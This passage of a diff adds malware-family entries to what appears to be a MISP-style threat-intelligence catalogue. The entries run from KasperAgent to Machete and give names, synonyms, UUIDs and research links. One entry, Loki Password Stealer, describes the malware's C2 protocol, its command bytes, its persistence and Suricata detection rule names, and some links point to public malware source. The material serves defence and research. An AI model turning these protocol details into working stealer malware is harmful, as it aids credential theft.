+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent",
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
+ "https://www.threatconnect.com/blog/kasperagent-malware-campaign/"
+ ]
+ },
+ "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c",
+ "value": "KasperAgent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar",
+ "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/"
+ ]
+ },
+ "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca",
+ "value": "Kazuar",
+ "description": ""
+ },
+ {
+ "meta": {
+ 
"synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip"
+ ]
+ },
+ "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755",
+ "value": "Kegotip",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos",
+ "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/",
+ "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
+ "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
+ "https://en.wikipedia.org/wiki/Kelihos_botnet"
+ ]
+ },
+ "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea",
+ "value": "Kelihos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "TSSL"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
+ "https://citizenlab.ca/2016/11/parliament-keyboy/",
+ "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/"
+ ]
+ },
+ "uuid": "28c13455-7f95-40a5-9568-1e8732503507",
+ "value": "KeyBoy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3",
+ "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
+ "https://twitter.com/smoothimpact/status/773631684038107136",
+ "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/"
+ ]
+ },
+ "uuid": "68039fbe-2eee-4666-b809-32a011e9852a",
+ "value": "APT3 Keylogger",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble",
+ 
"https://www.us-cert.gov/ncas/analysis-reports/AR18-221A"
+ ]
+ },
+ "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5",
+ "value": "KEYMARBLE",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat",
+ "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor",
+ "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+ ]
+ },
+ "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047",
+ "value": "KHRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac",
+ "https://www.group-ib.com/resources/threat-research/silence.html"
+ ]
+ },
+ "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493",
+ "value": "Kikothac",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk",
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/"
+ ]
+ },
+ "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027",
+ "value": "KillDisk",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Kasper Internet Non-Security",
+ "Maple"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins",
+ "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
+ "https://github.com/nyx0/KINS",
+ "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/",
+ "https://www.youtube.com/watch?v=C-dEOt0GzSE"
+ ]
+ },
+ "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11",
+ "value": "KINS",
+ "description": ""
+ },
+ {
+ "meta": {
+ 
"synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://www.morphick.com/resources/news/klrd-keylogger"
+ ]
+ },
+ "uuid": "70459959-5a20-482e-b714-2733f5ff310e",
+ "value": "KLRD",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic",
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
+ "https://github.com/zerosum0x0/koadic"
+ ]
+ },
+ "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6",
+ "value": "Koadic",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt",
+ "https://twitter.com/struppigel/status/812726545173401600"
+ ]
+ },
+ "uuid": "f7674d06-450a-4150-9180-afef94cce53c",
+ "value": "KokoKrypt",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni",
+ "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
+ "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
+ "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/",
+ "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant"
+ ]
+ },
+ "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf",
+ "value": "Konni",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface"
+ ]
+ },
+ "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3",
+ "value": "KoobFace",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Bisonal"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia",
+ 
"https://securitykitten.github.io/2014/11/25/curious-korlia.html",
+ "https://camal.coseinc.com/publish/2013Bisonal.pdf",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/",
+ "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf",
+ "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit"
+ ]
+ },
+ "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7",
+ "value": "Korlia",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter",
+ "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/",
+ "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
+ "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf"
+ ]
+ },
+ "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e",
+ "value": "Kovter",
+ "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer",
+ "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/"
+ ]
+ },
+ "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d",
+ "value": "KPOT Stealer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "BlackMoon"
+ ],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker",
+ "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan",
+ "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf",
+ "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
+ "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/"
+ ]
+ },
+ "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce",
+ "value": "KrBanker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader",
+ "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework"
+ ]
+ },
+ "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972",
+ "value": "KrDownloader",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Osiris"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos",
+ "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
+ "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn",
+ "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
+ "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en",
+ "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
+ "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
+ "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
+ "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
+ 
"https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/"
+ ]
+ },
+ "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17",
+ "value": "Kronos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Barys",
+ "Gofot",
+ "Kuaibpy"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8"
+ ]
+ },
+ "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7",
+ "value": "Kuaibu",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz"
+ ]
+ },
+ "uuid": "f9b3757e-99c7-4999-8b79-87609407f895",
+ "value": "Kuluoz",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58",
+ "value": "Kurton",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs",
+ "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
+ ]
+ },
+ "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3",
+ "value": "Kwampirs",
+ "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", + "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", + "http://adelmas.com/blog/longhorn.php", + "https://www.youtube.com/watch?v=jeLd-gw2bWo" + ] + }, + "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", + "value": "Lambert", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", + "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" + ] + }, + "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", + "value": "Lamdelin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", + "http://malware-traffic-analysis.net/2017/04/25/index.html", + "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", + "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", + "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/", + "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access" + ] + }, + "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", + "value": "LatentBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", + "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", + "https://twitter.com/PhysicalDrive0/status/828915536268492800", + "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html" + ] + }, + "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "value": "Lazarus", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", + "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", + "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" + ] + }, + "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", + "value": "Laziok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + ] + }, + "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", + "value": "Leash", + "description": "" + }, + { + "meta": { + "synonyms": [ + "shoco" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", + "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", + "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html", + "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html" + ] + }, + "uuid": "41da41aa-0729-428a-8b82-636600f8e230", + "value": "Leouncia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", + "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", + "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/", + "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", + "http://www.malware-traffic-analysis.net/2017/11/02/index.html" + ] + }, + "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", + "value": "Lethic", + "description": "Lethic is a spambot dating back to 2008. 
It is known to be distributing low-level pharmaceutical spam." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" + ] + }, + "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", + "value": "Limitail", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", + "value": "Listrix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", + "https://malware.news/t/recent-litehttp-activities-and-iocs/21053", + "https://github.com/zettabithf/LiteHTTP" + ] + }, + "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", + "value": "LiteHTTP", + "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. 
\r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", + "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", + "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", + "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", + "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", + "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" + ] + }, + "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", + "value": "Locky", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" + ] + }, + "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", + "value": "Locky (Decryptor)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" + ] + }, + "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", + "value": "Locky Loader", + "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", + "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", + "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", + "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" + ] + }, + "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", + "value": "LockPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nymeria" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", + "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", + "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" + ] + }, + "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", + "value": "Loda", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", + "value": "Logedrut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", + "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" + ] + }, + "uuid": "2789b246-d762-4d38-8cc8-302293e314da", + "value": "LogPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Loki", + "LokiPWS", + "LokiBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", + "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", + "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", + "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", + "https://github.com/R3MRUM/loki-parse", + "http://www.malware-traffic-analysis.net/2017/06/12/index.html", + "http://blog.fernandodominguez.me/lokis-antis-analysis/", + "https://phishme.com/loki-bot-malware/", + "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", + "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", + "value": "Loki Password Stealer (PWS)", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a 
command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. 
By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", + "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", + "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", + "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", + "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", + "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/" + ] + }, + "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", + "value": "Luminosity 
RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", + "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" + ] + }, + "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", + "value": "Lurk", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" + ] + }, + "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", + "value": "Luzo", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Lucky Locker", + "Adneukine", + "Bomba Locker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", + "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", + "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", + "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" + ] + }, + "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", + "value": "Lyposit", + "description": "" + }, + { + "meta": { + "synonyms": [ + "El Machete" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", + "https://securelist.com/el-machete/66108/", + "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", + "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" + ] + }, + "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", 